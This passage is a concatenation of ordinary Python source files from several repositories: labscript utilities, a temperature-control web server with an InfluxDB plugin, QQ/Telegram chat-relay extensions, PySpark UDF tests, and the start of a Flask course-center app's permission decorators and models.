{
"source": "JQIamo/labscript-utils",
"score": 3
}
#### File: labscript-utils/labscript_utils/memprof.py
```python
import gc
class MemoryProfiler(object):
"""Class to count number instances of each type in the interpreter in order to
detect Python memory leaks"""
def __init__(self):
self.filepath = None
self.initial_counts = None
def count_types(self):
types = {}
for obj in gc.get_objects():
try:
c = obj.__class__
except AttributeError:
c = type(obj)
try:
types[c] += 1
except KeyError:
types[c] = 1
self.write_to_file(types)
return types
def write_to_file(self, types):
with open(self.filepath, 'w') as f:
names = list(types.keys())
names.sort(key=lambda name: -types[name])
for name in names:
f.write(str(name).rjust(60) + ' ' +
str(types[name]).rjust(8) + '\n')
def start(self, filepath='memprof.txt'):
self.filepath = filepath
self.initial_counts = self.count_types()
def check(self):
diffs = {}
types = self.count_types()
for type_ in types:
try:
diffs[type_] = types[type_] - self.initial_counts[type_]
except KeyError:
diffs[type_] = types[type_]
self.write_to_file(diffs)
return True
_memory_profiler = MemoryProfiler()
start = _memory_profiler.start
check = _memory_profiler.check
```
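A minimal usage sketch of the module-level `start`/`check` API above (the file name and the "leaky" code are placeholders): call `start()` once to record baseline type counts, then `check()` later to rewrite the file with per-type count differences.
```python
# Hypothetical usage of labscript_utils.memprof; the "leak" here is only for illustration.
import labscript_utils.memprof as memprof

memprof.start('memprof.txt')        # record baseline counts and write them to memprof.txt

leaked = []
for _ in range(3):
    leaked.extend(object() for _ in range(10000))   # code suspected of leaking
    memprof.check()                 # rewrite memprof.txt with count deltas since start()
```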
#### File: labscript_utils/qtwidgets/outputbox.py
```python
import qtutils.outputbox
from labscript_utils.ls_zprocess import Context
class OutputBox(qtutils.outputbox.OutputBox):
"""A subclass of qtutils.outputbox.OutputBox configured with security from
labconfig."""
def __init__(self, container, scrollback_lines=1000):
context = Context.instance()
# Since we are using our Context, which is a subclass of
# zprocess.security.SecureContext, we can listen on public interfaces. Insecure
        # messages arriving from external interfaces will be discarded.
qtutils.outputbox.OutputBox.__init__(
self,
container=container,
scrollback_lines=scrollback_lines,
zmq_context=context,
bind_address='tcp://0.0.0.0',
)
```
{
"source": "JQIamo/labscript_utils",
"score": 2
}
#### File: labscript_utils/labscript_utils/settings.py
```python
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
import labscript_utils.h5_lock, h5py
from labscript_utils.qtwidgets.fingertab import FingerTabWidget
# Create a generic interface for displaying pages of settings
class Settings(object):
def __init__(self,storage='hdf5',file=None,parent = None,page_classes = []):
self.pages = {}
self.instantiated_pages = {}
self.dialog_open = False
self.parent = parent
self.storage = storage
self.file = file
self.callback_list = []
if not self.file:
raise Exception('You must specify a file to load/save preferences from')
for c in page_classes:
self.add_settings_interface(c)
    # This function can be called to add an interface.
    # Each one of these will display as a separate page in the settings window.
    # You cannot add a class more than once!
    # Classes must have unique Class.name attributes! (This might change later...)
def add_settings_interface(self,setting_class):
if setting_class.name in self.pages:
return False
self.pages[setting_class.name] = setting_class(self.load(setting_class.name))
return True
def load(self,name):
if self.storage == 'hdf5':
with h5py.File(self.file,'r+') as h5file:
# does the settings group exist?
if 'preferences' not in h5file:
h5file['/'].create_group('preferences')
# is there an entry for this preference type?
group = h5file['/preferences']
if name not in group.attrs:
group.attrs[name] = repr({})
try:
data = eval(group.attrs[name])
except Exception:
# TODO: log this properly
print('Could not load settings data for %s. It may contain data that could not be evaluated. All settings have now been lost'%name)
data = {}
return data
else:
raise Exception("the Settings module cannot handle the storage type: %s"%str(self.storage))
# A simple interface for accessing values in the settings interface
def get_value(self,settings_class,value_name):
return self.pages[settings_class.name].get_value(value_name)
# goto_page should be the CLASS which you wish to go to!
def create_dialog(self,goto_page=None):
if not self.dialog_open:
self.instantiated_pages = {}
# Create the dialog
self.dialog = QDialog(self.parent)
self.dialog.setModal(True)
self.dialog.accepted.connect(self.on_save)
self.dialog.rejected.connect(self.on_cancel)
self.dialog.setMinimumSize(800,600)
self.dialog.setWindowTitle("Preferences")
# Remove the help flag next to the [X] close button
self.dialog.setWindowFlags(self.dialog.windowFlags() & ~Qt.WindowContextHelpButtonHint)
# Create the layout
layout = QVBoxLayout(self.dialog)
#Create the Notebook
self.notebook = FingerTabWidget(self.dialog)
self.notebook.setTabPosition(QTabWidget.West)
self.notebook.show()
layout.addWidget(self.notebook)
# Create the button box
widget = QWidget()
hlayout = QHBoxLayout(widget)
button_box = QDialogButtonBox()
button_box.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
button_box.accepted.connect(self.dialog.accept)
button_box.rejected.connect(self.dialog.reject)
hlayout.addItem(QSpacerItem(0,0,QSizePolicy.MinimumExpanding,QSizePolicy.Minimum))
hlayout.addWidget(button_box)
layout.addWidget(widget)
#sorted(a.items(),key=lambda x: x[1])
set_page = None
#self.temp_pages = []
for name, c in sorted(self.pages.items()):
page,icon = c.create_dialog(self.notebook)
# save page
self.instantiated_pages[c.__class__] = page
# Create label
#if isinstance(icon,gtk.Image):
# use their icon
# pass
#else:
# use default icon
# pass
self.notebook.addTab(page,c.name)
if goto_page and isinstance(c,goto_page):
# this is the page we want to go to!
set_page = page
            # We do this here in case one of the settings pages specifically inserts itself
            # in an out-of-order place (e.g. first). We hope that everything will be in
            # alphabetical order, but maybe not!
if set_page:
self.notebook.tabBar().setCurrentIndex(self.notebook.indexOf(set_page))
pass
self.dialog.show()
self.dialog_open = True
else:
if goto_page and goto_page in self.instantiated_pages:
self.notebook.tabBar().setCurrentIndex(self.notebook.indexOf(self.instantiated_pages[goto_page]))
def register_callback(self,callback):
self.callback_list.append(callback)
def remove_callback(self,callback):
self.callback_list.remove(callback)
def on_save(self,*args,**kwargs):
# Save the settings
if self.storage == 'hdf5':
with h5py.File(self.file,'r+') as h5file:
group = h5file['/preferences']
for page in self.pages.values():
group.attrs[page.__class__.name] = repr(page.save())
else:
# this should never happen as the exception will have been raised on load!
pass
# run callback functions!
# Notifies other areas of the program that settings have changed
for callback in self.callback_list:
callback()
self.close()
def on_cancel(self,*args,**kwargs):
self.close()
def close(self,*args,**kwargs):
if self.dialog_open:
# Close the setting classes
for page in self.pages.values():
page.close()
self.dialog_open = False
self.dialog.deleteLater()
self.dialog = None
```
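A hypothetical page class, inferred from how `Settings` calls into its pages above (a class-level `name`, a constructor that receives the previously saved dict, `create_dialog` returning `(widget, icon)`, plus `get_value`, `save`, and `close`); this is a sketch, not part of the library.
```python
# Hypothetical settings page, inferred from the Settings class above.
from qtutils.qt.QtWidgets import QWidget, QVBoxLayout, QCheckBox

class ExamplePage(object):
    name = 'example'  # must be unique across registered page classes

    def __init__(self, data):
        # data is the dict previously returned by save(), or {} on first run
        self.data = data

    def create_dialog(self, notebook):
        # Return the widget to show in the notebook, plus an (optional) icon
        self.widget = QWidget()
        layout = QVBoxLayout(self.widget)
        self.checkbox = QCheckBox('Enable feature')
        self.checkbox.setChecked(self.data.get('enabled', False))
        layout.addWidget(self.checkbox)
        return self.widget, None

    def get_value(self, name):
        return self.data.get(name)

    def save(self):
        # Whatever is returned here is repr()'d into the HDF5 'preferences' attribute
        self.data['enabled'] = self.checkbox.isChecked()
        return self.data

    def close(self):
        pass

# settings = Settings(file='experiment.h5', page_classes=[ExamplePage])
# settings.create_dialog()
```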
#### File: labscript_utils/labscript_utils/tracelog.py
```python
import sys
import inspect
import threading
from datetime import datetime
import traceback
def log(log_path=None, module_names=(), sub=False, all=False, mode='w'):
"""Trace and log Python execution.
    Output includes the time, thread name, containing function name, line number and source line.
    Indentation before the thread name represents stack depth; indentation before the source line is as in the source line itself.
log_path: the path of the desired output file to write to, or None for stdout (default=None)
module_names: list of module names that tracing is desired for (default=())
sub: whether submodules of the above modules should be traced (default=False)
all: whether all modules should be traced, in which case module_names is ignored (default=False)
mode: mode to open the output file in, if log_path is not None (default='w')
"""
if log_path is None:
outfile = sys.stdout
else:
outfile = open(log_path, mode, 1)
threadlocal = threading.local()
def per_thread_init():
threadlocal.stack_depth = 0
threadlocal.threadname = threading.current_thread().name
threadlocal.is_initialised = True
def write(module_name, lineno, function, message):
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3] # chop microseconds to milliseconds
indentation = ' '*(2*threadlocal.stack_depth - 1)
output = "[%s]%s%s: %s:%s in %s: " % (timestamp, indentation, threadlocal.threadname, module_name, lineno, function)
if isinstance(message, list):
indent = len(output)
output += message[0]
for line in message[1:]:
output += ' '*indent + line
else:
output += message + '\n'
# This is atomic, thanks to the GIL, so we don't need to serialise access from multiple threads:
outfile.write(output)
def traceit(frame, event, arg):
if sys is None:
# Interpreter is shutting down
return
try:
assert threadlocal.is_initialised
except AttributeError:
per_thread_init()
if event == "call":
threadlocal.stack_depth += 1
elif event == "return":
threadlocal.stack_depth -= 1
else:
filename, lineno, function, code_context, index = inspect.getframeinfo(frame, context=1)
try:
module_name = frame.f_globals["__name__"]
except KeyError:
module_name = '<string>'
if module_name in module_names or all or (sub and any([module_name.startswith(s) for s in module_names])):
line = code_context[0].rstrip() if code_context else '<within exec() or eval()>'
if event == 'line':
write(module_name, lineno, function, line)
elif event == 'exception':
exc_type, exc_value, _ = arg
exception = traceback.format_exception_only(exc_type, exc_value)
write(module_name, lineno, function, exception)
return traceit
per_thread_init()
write('tracelog','','','\n\n***starting***\n')
threading.settrace(traceit)
sys.settrace(traceit)
```
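A short usage sketch of `log` (the module name `my_experiment` and the log file name are placeholders): enable tracing before importing or running the code you want traced.
```python
# Hypothetical usage of labscript_utils.tracelog; 'my_experiment' is a placeholder module.
from labscript_utils import tracelog

# Trace my_experiment and its submodules, appending to trace.log:
tracelog.log('trace.log', module_names=['my_experiment'], sub=True, mode='a')

import my_experiment        # line-by-line execution inside my_experiment.* is now logged
my_experiment.run()         # placeholder entry point
```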
#### File: labscript_utils/labscript_utils/zlock.py
```python
import sys
import subprocess
from socket import gethostbyname
from labscript_utils.ls_zprocess import get_config
from labscript_utils.setup_logging import LOG_PATH
from zprocess import start_daemon
def main():
config = get_config()
if gethostbyname(config['zlock_host']) != gethostbyname('localhost'):
msg = (
"Zlock not configured to run on this host according to labconfig: "
+ "zlock_host=%s" % config['zlock_host']
)
raise ValueError(msg)
cmd = [
sys.executable,
'-m',
'zprocess.zlock',
'--port',
config['zlock_port'],
'-l',
LOG_PATH,
]
if config['shared_secret_file'] is not None:
cmd += ['--shared-secret-file', config['shared_secret_file']]
elif config['allow_insecure']:
cmd += ['--allow-insecure']
else:
cmd += ['--no-allow-insecure']
if '--daemon' in sys.argv:
start_daemon(cmd)
else:
try:
subprocess.call(cmd)
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
```
{
"source": "JQIamo/temperature-control-app",
"score": 2
}
#### File: temperature_web_control/plugin/influx_push_plugin.py
```python
import time
import requests
import base64
from typing import Union
from logging import Logger
from temperature_web_control.plugin.plugin_base import PluginState
from temperature_web_control.server.app_core import TemperatureAppCore
from temperature_web_control.utils import Config
class TokenAuth(requests.auth.AuthBase):
def __init__(self, token):
self.token = token
def __call__(self, r):
r.headers['Authorization'] = f'Basic {self.token}'
return r
class InfluxPushPluginState(PluginState):
def __init__(self, config: Config, app_core: TemperatureAppCore, logger: Logger):
self.config = config
self.app_core = app_core
self.logger = logger
token = self.config.get("influx_plugin", "token", default=None)
if not token:
user = self.config.get("influx_plugin", "user")
password = self.config.get("influx_plugin", "password")
            token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
self.auth = TokenAuth(token)
self.url = self.config.get("influx_plugin", "influx_api_url")
        self.database = self.config.get("influx_plugin", "database")
self.measurement = self.config.get("influx_plugin", "measurement")
self.interval = self.config.get("influx_plugin", "push_interval", default=5) * 60
self.last_push_time = 0
self.app_core.subscribe_to("status_available", self, self.on_status_available_event)
async def on_status_available_event(self, subscribers, message):
if time.time() - self.last_push_time < self.interval:
return
self.last_push_time = time.time()
try:
status = message['status']
t = f"{int(time.time()*1e9):d}"
req_url = requests.compat.urljoin(self.url, f"/write?db={self.database}")
self.logger.debug(f"Influx Push Plugin: Push to {req_url}")
req = []
for dev in status.values():
if 'temperature' not in dev:
                    continue
req.append(f"{self.measurement} {dev['name']}={dev['temperature']:.1f},{dev['name']}_units=\"C\" {t}")
self.logger.debug(f"Influx Push Plugin: Request {req}")
r = requests.post(req_url, data="\n".join(req), auth=self.auth, timeout=3)
r.raise_for_status()
except Exception as e:
self.logger.error("Influx Push Plugin: Error while making request:")
self.logger.exception(e)
async def run(self):
pass
async def initialize(config: Config, app_core: TemperatureAppCore, logger: Logger) -> Union[PluginState, None]:
if config.get("influx_plugin", default=None):
plugin = InfluxPushPluginState(config, app_core, logger)
return plugin
else:
return None
```
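For reference, a small standalone illustration of the InfluxDB line-protocol body that `on_status_available_event` assembles; the `status` dict and measurement name here are made up, and the field names follow the f-string above.
```python
# Illustration of the line-protocol payload built by the plugin; values are hypothetical.
import time

measurement = "temperature"                     # would come from config: influx_plugin.measurement
status = {
    "oven": {"name": "oven", "temperature": 75.4},
    "cell": {"name": "cell", "temperature": 120.0},
}

t = f"{int(time.time() * 1e9):d}"               # nanosecond timestamp, as in the plugin
lines = [
    f"{measurement} {dev['name']}={dev['temperature']:.1f},{dev['name']}_units=\"C\" {t}"
    for dev in status.values()
    if 'temperature' in dev
]
print("\n".join(lines))
# temperature oven=75.4,oven_units="C" <ns timestamp>
# temperature cell=120.0,cell_units="C" <ns timestamp>
```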
#### File: temperature_web_control/server/ws_server.py
```python
import json
import asyncio
from functools import wraps, partial
from logging import Logger
import websockets
class WebSocketServer:
def __init__(self, bind_addr, port, logger):
self.bind_addr = bind_addr
self.port = port
self.active_ws = []
self.event_handlers = {}
self.logger: Logger = logger
def register_event_handler(self, event, handler):
if event not in self.event_handlers:
self.event_handlers[event] = [handler]
else:
self.event_handlers[event].append(handler)
async def handler(self, websocket):
self.logger.info(f"WSServer: New connection from "
f"{websocket.remote_address[0]}:{websocket.remote_address[1]}.")
self.active_ws.append(websocket)
try:
async for message in websocket:
self.logger.info(f"WSServer: Incoming message from "
f"{websocket.remote_address[0]}:{websocket.remote_address[1]}.")
self.logger.info(message)
event = json.loads(message)
event_type = event['event']
if event_type in self.event_handlers:
event['_client_ws'] = websocket
await asyncio.gather(*[ handler(event, partial(self.send_event, websocket, event_type))
for handler in self.event_handlers[event_type] ])
except (websockets.ConnectionClosed, websockets.ConnectionClosedOK, websockets.ConnectionClosedError):
self.logger.info(f"WSServer: Connection to client "
f"{websocket.remote_address[0]}:{websocket.remote_address[1]} closed.")
finally:
self.logger.info(f"WSServer: Remove client "
f"{websocket.remote_address[0]}:{websocket.remote_address[1]} from the broadcast list.")
self.active_ws.remove(websocket)
if 'disconnected' in self.event_handlers:
event = {
'event': 'disconnected',
'_client_ws': websocket
}
await asyncio.gather(*[handler(event, None) for handler in self.event_handlers['disconnected']])
async def send(self, websocket, message_dict):
try:
self.logger.debug(f"Send to : {websocket}" + json.dumps(message_dict))
await websocket.send(json.dumps(message_dict))
except websockets.ConnectionClosed:
pass
async def send_event(self, websocket, event, message_dict):
try:
message_dict.update({ 'event': event })
self.logger.debug(f"WSServer: Send to : {websocket}" + json.dumps(message_dict))
await websocket.send(json.dumps(message_dict))
except websockets.ConnectionClosed:
pass
async def broadcast(self, websocket_clients, message_dict):
self.logger.debug("Broadcast: " + json.dumps(message_dict))
websockets.broadcast(websocket_clients, json.dumps(message_dict))
async def serve_until_exit(self):
self.logger.info(f"WSServer: Websocket server running at ws://{self.bind_addr}:{self.port}")
async with websockets.serve(self.handler, self.bind_addr, self.port, ping_timeout=20, ping_interval=5):
await asyncio.Future()
```
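A minimal sketch of wiring up `WebSocketServer` (the `ping` event, its payload, and the port are invented for illustration); each handler receives the decoded event dict and a `reply` callable, which is `None` for the synthetic `disconnected` event.
```python
# Hypothetical wiring of the WebSocketServer above; the 'ping' event is made up.
import asyncio
import logging

async def on_ping(event, reply):
    # reply is partial(send_event, websocket, event_type), or None for 'disconnected'
    if reply is not None:
        await reply({'message': 'pong'})

async def main():
    logging.basicConfig(level=logging.DEBUG)
    server = WebSocketServer('0.0.0.0', 3001, logging.getLogger('ws'))
    server.register_event_handler('ping', on_ping)
    await server.serve_until_exit()

# asyncio.run(main())
```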
#### File: temperature_web_control/test/test_omega.py
```python
from temperature_web_control.driver.io_device import IODevice
from temperature_web_control.driver.omega_driver import OmegaISeries
class DummyIODevice(IODevice):
def __init__(self):
self.dummy_resp = {}
self.last_send = b""
self.expectation = []
def send(self, data: bytes):
self.last_send = data
print(">> " + data.decode("utf-8"))
if self.expectation:
assert data == self.expectation[0]
del self.expectation[0]
def recv(self, max_len=-1):
assert self.last_send in self.dummy_resp
return self.dummy_resp[self.last_send]
def expect(self, expect):
self.expectation.append(expect)
if expect not in self.dummy_resp:
self.dummy_resp[expect] = b""
class TestOmega:
def test_read_temperature(self):
io_dev = DummyIODevice()
io_dev.dummy_resp = {
b"*R1F\r": b"R1F14\r",
b"*R08\r": b"R0842\r"
}
omega = OmegaISeries(io_dev, output=1)
assert omega.echo_enabled
assert omega.unit == "C"
io_dev.dummy_resp[b"*X01\r"] = b"X01075.4\r"
assert omega.temperature == 75.4
io_dev.dummy_resp[b"*R01\r"] = b"R012003E8\r"
assert omega.setpoint == 100
io_dev.expect(b"*D03\r")
omega.control_enabled = False
io_dev.expect(b"*E03\r")
omega.control_enabled = True
io_dev.expect(b"*W01A003E8\r")
omega.setpoint = -100
io_dev.dummy_resp[b"*R0C\r"] = b"R0C01\r"
assert not omega.auto_pid
io_dev.expect(b"*R0C\r")
io_dev.expect(b"*W0C05\r")
omega.auto_pid = True
io_dev.dummy_resp[b"*R17\r"] = b"R1700C8\r"
assert omega.p_param == 200
io_dev.dummy_resp[b"*R18\r"] = b"R1800B4\r"
assert omega.i_param == 180
io_dev.dummy_resp[b"*R19\r"] = b"R190000\r"
assert omega.d_param == 0
io_dev.expect(b"*W170096\r")
omega.p_param = 150
io_dev.expect(b"*W180096\r")
omega.i_param = 150
io_dev.expect(b"*W190096\r")
omega.d_param = 150
```
{
"source": "JQ-Networks/UMRExtensions",
"score": 2
}
#### File: UMRExtensions/umr_extensions_demo/cmd_echo.py
```python
from typing import List
from unified_message_relay.Core.UMRType import ChatAttribute
from unified_message_relay.Core.UMRCommand import register_command, quick_reply
@register_command(cmd='echo', description='reply every word you sent')
async def command(chat_attrs: ChatAttribute, args: List):
"""
Prototype of command
:param chat_attrs:
:param args:
:return:
"""
if not args: # args should not be empty
return
await quick_reply(chat_attrs, ' '.join(args))
```
#### File: UMRExtensions/umr_extensions_demo/QQ_group_invite.py
```python
from typing import List, Dict
import asyncio
from unified_message_relay.Core import UMRLogging
from unified_message_relay.Core import UMRConfig
from unified_message_relay.Core.UMRCommand import register_command, quick_reply
from unified_message_relay.Core.UMRType import ChatAttribute, UnifiedMessage, MessageEntity, GroupID, DestinationMessageID, SendAction
from unified_message_relay.Core.UMRMessageRelation import get_relation_dict
from umr_coolq_driver import driver as QQ
from unified_message_relay.Core import UMRDriver
from aiogram import Bot, Dispatcher, executor, types
from aiogram.utils.callback_data import CallbackData
import threading
from time import sleep
logger = UMRLogging.get_logger('Plugin.QQ-group-invite')
# @register_command(cmd=['del', 'recall'], description='recall all related qq message sent by forward bot')
# async def command(chat_attrs: ChatAttribute, args: List):
# if chat_attrs.reply_to:
# message_relation = get_relation_dict(src_platform=chat_attrs.platform,
# src_chat_id=chat_attrs.chat_id,
# src_chat_type=chat_attrs.chat_type,
# message_id=chat_attrs.reply_to.message_id)
#
# dst_drivers = {k: v for k, v in driver_lookup_table.items() if isinstance(v, QQ.QQDriver)}
#
# if message_relation:
# filtered_message_ids: Dict[GroupID, DestinationMessageID] = {k: w for k, w in message_relation.items() if
# k.platform in dst_drivers}
# if filtered_message_ids:
# for key, value in filtered_message_ids.items():
# asyncio.run_coroutine_threadsafe(dst_drivers[value.platform].delete_msg(message_id=value.message_id), dst_drivers[value.platform].loop)
# reply_text = 'Message recalled'
# else:
# reply_text = 'No related QQ message found'
# else:
# reply_text = 'Message not recallable'
# else:
# reply_text = 'No message specified, please reply to a message'
#
# await quick_reply(chat_attrs, reply_text)
bot_token = UMRConfig.config.get('TelegramConsole')
admin_list = UMRConfig.config.get('BotAdmin', dict())
if admin_list:
admin_list = admin_list.get('Telegram')
accept_cb = CallbackData('request', 'result', 'driver', 'request_type', 'handle')
# todo post init trigger
sleep(5)
dst_drivers = {k: v for k, v in UMRDriver.driver_lookup_table.items() if isinstance(v, QQ.QQDriver)}
def get_keyboard(driver: str, request_type: str, handle: str):
return types.InlineKeyboardMarkup().row(
        types.InlineKeyboardButton('Accept', callback_data=accept_cb.new(result='accept', driver=driver,
request_type=request_type, handle=handle)),
        types.InlineKeyboardButton('Decline', callback_data=accept_cb.new(result='decline', driver=driver,
request_type=request_type, handle=handle))
)
def start():
def run():
def handle_exception(loop, context):
# context["message"] will always be there; but context["exception"] may not
msg = context.get("exception", context["message"])
logger.exception('Unhandled exception: ', exc_info=msg)
logger.debug('Running qq-group-invite start')
loop = asyncio.new_event_loop()
loop.set_exception_handler(handle_exception)
asyncio.set_event_loop(loop)
bot = Bot(token=bot_token)
dp = Dispatcher(bot)
for driver_name, driver in dst_drivers.items():
@driver.bot.on_request()
            async def handle_event(context, driver=driver, driver_name=driver_name):
                # default arguments bind the current loop values, avoiding the late-binding closure pitfall
user_id = context.get('user_id')
stranger_name = driver.bot.get_stranger_info(user_id=user_id).get('nickname', str(user_id))
if context['request_type'] == 'group':
group_name = driver.bot.get_group_info(group_id=context["group_id"]) \
.get('group_name', str(context["group_id"]))
if context['sub_type'] == 'add':
action = 'group_add'
message = f'"{stranger_name}" wants to join group "{group_name}".'
else:
action = 'group_invite'
message = f'"{stranger_name}" wants to add you to group "{group_name}".'
elif context['request_type'] == 'friend':
action = 'friend'
message = f'"{stranger_name}" wants to add you as friend.'
else:
logger.info('unhandled event: ' + str(context))
return
for chat_id in admin_list:
asyncio.run_coroutine_threadsafe(
bot.send_message(chat_id, message,
reply_markup=get_keyboard(driver_name, action, context['flag'])), loop)
@dp.callback_query_handler(accept_cb.filter(result=['accept', 'decline']))
async def callback_vote_action(query: types.CallbackQuery, callback_data: dict):
logger.info('Got this callback data: %r', callback_data)
await query.answer() # don't forget to answer callback query as soon as possible
callback_data_action = callback_data['result']
callback_driver = dst_drivers[callback_data['driver']]
callback_request_type = callback_data['request_type']
callback_handle = callback_data['handle']
if callback_data_action == 'accept':
if callback_request_type == 'group_add':
callback_driver.bot.set_group_add_request(flag=callback_handle, sub_type='add', approve=True)
elif callback_request_type == 'group_invite':
callback_driver.bot.set_group_add_request(flag=callback_handle, sub_type='invite', approve=True)
else:
callback_driver.bot.set_friend_add_request(flag=callback_handle, approve=True)
else:
if callback_request_type == 'group_add':
callback_driver.bot.set_group_add_request(flag=callback_handle, sub_type='add', approve=False)
elif callback_request_type == 'group_invite':
callback_driver.bot.set_group_add_request(flag=callback_handle, sub_type='invite', approve=False)
else:
callback_driver.bot.set_friend_add_request(flag=callback_handle, approve=False)
            await bot.edit_message_text(
                query.message.text + ('\nAccepted' if callback_data_action == 'accept' else '\nDeclined'),
                query.from_user.id,
                query.message.message_id
            )
executor.start_polling(dp, skip_updates=True, loop=loop)
t = threading.Thread(target=run)
t.daemon = True
UMRDriver.threads.append(t)
t.start()
logger.debug(f'Finished qq-group-invite initialization')
if bot_token and admin_list:
start()
```
#### File: UMRExtensions/umr_extensions_demo/QQ_recall.py
```python
from typing import List, Dict
import asyncio
from unified_message_relay.Core import UMRLogging
from unified_message_relay.Core.UMRCommand import register_command, quick_reply
from unified_message_relay.Core.UMRType import ChatAttribute, UnifiedMessage, MessageEntity, GroupID, DestinationMessageID, SendAction
from unified_message_relay.Core.UMRMessageRelation import get_relation_dict
from umr_coolq_driver import driver as QQ
from unified_message_relay.Core.UMRDriver import driver_lookup_table
logger = UMRLogging.get_logger('Plugin.QQ-recall')
@register_command(cmd=['del', 'recall'], description='recall all related qq message sent by forward bot')
async def command(chat_attrs: ChatAttribute, args: List):
if chat_attrs.reply_to:
message_relation = get_relation_dict(src_platform=chat_attrs.platform,
src_chat_id=chat_attrs.chat_id,
src_chat_type=chat_attrs.chat_type,
message_id=chat_attrs.reply_to.message_id)
dst_drivers = {k: v for k, v in driver_lookup_table.items() if isinstance(v, QQ.QQDriver)}
if message_relation:
filtered_message_ids: Dict[GroupID, DestinationMessageID] = {k: w for k, w in message_relation.items() if
k.platform in dst_drivers}
if filtered_message_ids:
for key, value in filtered_message_ids.items():
asyncio.run_coroutine_threadsafe(dst_drivers[value.platform].bot.delete_msg(message_id=value.message_id), dst_drivers[value.platform].loop)
reply_text = 'Message recalled'
else:
reply_text = 'No related QQ message found'
else:
reply_text = 'Message not recallable'
else:
reply_text = 'No message specified, please reply to a message'
await quick_reply(chat_attrs, reply_text)
```
{
"source": "jq/pyspark_xgboost",
"score": 3
}
#### File: pyspark_xgboost/pyspark_xgboost/xgboost.py
```python
def train_with_dataframe(df, params, rounds, workers, use_external_memory):
assert rounds >= 0
# assume spark_session.conf.set("spark.sql.execution.arrow.enabled", "true")
pdf = df.toPandas()
return 0
```
#### File: pyspark_xgboost/tests/test_udf.py
```python
from pyspark import SQLContext
from pyspark.sql.functions import pandas_udf, PandasUDFType
from pyspark.sql.types import IntegerType, StringType, LongType, DoubleType, StructType, StructField
@pandas_udf(StringType())
def to_upper(s):
return s.str.upper()
# can't use "integer" or 'integer'
@pandas_udf(IntegerType(), PandasUDFType.SCALAR)
def add_one(x):
    # TODO: this does not get printed out
print("add_one")
return x + 1
schema = StructType([
    StructField("id", IntegerType(), True),
    StructField("v", DoubleType(), True),
])
@pandas_udf(schema, PandasUDFType.GROUPED_MAP)
def normalize(pdf):
v = pdf.v
print("mean: ")
print(v.mean())
return pdf.assign(v=(v - v.mean()) / v.std())
def group_by(spark_context, spark_session):
sql_sc = SQLContext(spark_context)
spark_session.conf.set("spark.sql.execution.arrow.enabled", "true")
df = sql_sc.createDataFrame([(1, 1.0), (1, 2.0), (2, 3.0), (2, 5.0), (2, 10.0)],
("id", "v"))
    # TODO: count() raises Py4JJavaError: An error occurred while calling o71.count.
df.groupby("id").apply(normalize).count()
# https://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.functions.pandas_udf
def test_udf(spark_context, spark_session):
sql_sc = SQLContext(spark_context)
spark_session.conf.set("spark.sql.execution.arrow.enabled", "true")
df = sql_sc.createDataFrame([(1, "<NAME>", 21)],
("id", "name", "age"))
# df.printSchema()
#
# df.show()
slen = pandas_udf(lambda s: s.str.len(), IntegerType())
# below is similar to @
# upper = pandas_udf(to_upper, StringType())
# addOne = pandas_udf(add_one, IntegerType(), PandasUDFType.SCALAR)
# this works
df.select("name").show()
# this doesn't work, Caused by: java.io.EOFException
# at java.io.DataInputStream.readInt(DataInputStream.java:392)
# seems related to slen output int
# df.select(slen("name").alias("slen(name)")).show()
# TODO this hit same error
# df.select(to_upper("name")).show()
print(df.select(slen("name").alias("slen(name)"),
to_upper("name"), add_one("age")).count())
```
{
"source": "jqqqqqqqqqq/CourseCenter",
"score": 3
}
#### File: CourseCenter/app/auths.py
```python
from flask import flash, redirect, url_for
from flask_login import current_user
from .models.models import Student, Teacher, Course
from functools import wraps
class UserAuth:
"""
    Authorization decorators. Apply the matching decorator beneath a route; if the user lacks permission they are redirected to the home page.
"""
@staticmethod
def dean(func):
@wraps(func)
def decorated(*args, **kwargs):
if not current_user.user_type() == 0:
flash('无权限', 'danger')
return redirect(url_for('main.index'))
else:
return func(*args, **kwargs)
return decorated
@staticmethod
def teacher(func):
@wraps(func)
def decorated(*args, **kwargs):
if not current_user.user_type() == 1:
flash('无权限', 'danger')
return redirect(url_for('main.index'))
else:
return func(*args, **kwargs)
return decorated
@staticmethod
def student(func):
@wraps(func)
def decorated(*args, **kwargs):
if not current_user.user_type() == 2:
flash('无权限!', 'danger')
return redirect(url_for('main.index'))
else:
return func(*args, **kwargs)
return decorated
@staticmethod
def teacher_course_access(func):
@wraps(func)
def decorated(*args, **kwargs):
if not Course.query.filter_by(id=kwargs['course_id']).filter(
Course.teachers.any(id=current_user.id)).first():
flash('无权限!', 'danger')
return redirect(url_for('main.index'))
else:
return func(*args, **kwargs)
return decorated
@staticmethod
def student_course_access(func):
@wraps(func)
def decorated(*args, **kwargs):
if not Course.query.filter_by(id=kwargs['course_id']).filter(
Course.students.any(id=current_user.id)).first():
flash('无权限!', 'danger')
return redirect(url_for('main.index'))
else:
return func(*args, **kwargs)
return decorated
```
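A sketch of how these decorators are meant to be applied beneath a route, as the class docstring describes; the blueprint, URL, template, and import path are placeholders inferred from the file layout.
```python
# Hypothetical route protected by UserAuth; blueprint and template names are placeholders.
from flask import Blueprint, render_template
from flask_login import login_required
from app.auths import UserAuth

teacher = Blueprint('teacher', __name__)

@teacher.route('/<course_id>/homework', methods=['GET'])
@login_required
@UserAuth.teacher_course_access   # redirects to main.index unless current_user teaches this course
def manage_homework(course_id):
    return render_template('teacher/homework.html', course_id=course_id)
```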
#### File: app/models/models.py
```python
from app import db, login_manager
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from flask import session
SCRelationship = db.Table('sc_relationship', db.Model.metadata,
db.Column('student_id', db.Integer, db.ForeignKey('students.id')),
db.Column('course_id', db.Integer, db.ForeignKey('courses.id'))
)
TCRelationship = db.Table('tc_relationship', db.Model.metadata,
db.Column('teacher_id', db.Integer, db.ForeignKey('teachers.id')),
db.Column('course_id', db.Integer, db.ForeignKey('courses.id'))
)
class DeanInfo(UserMixin, db.Model):
__tablename__ = 'deanInfo'
id = db.Column(db.Integer, primary_key=True)
password_hash = db.Column(db.String(128))
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
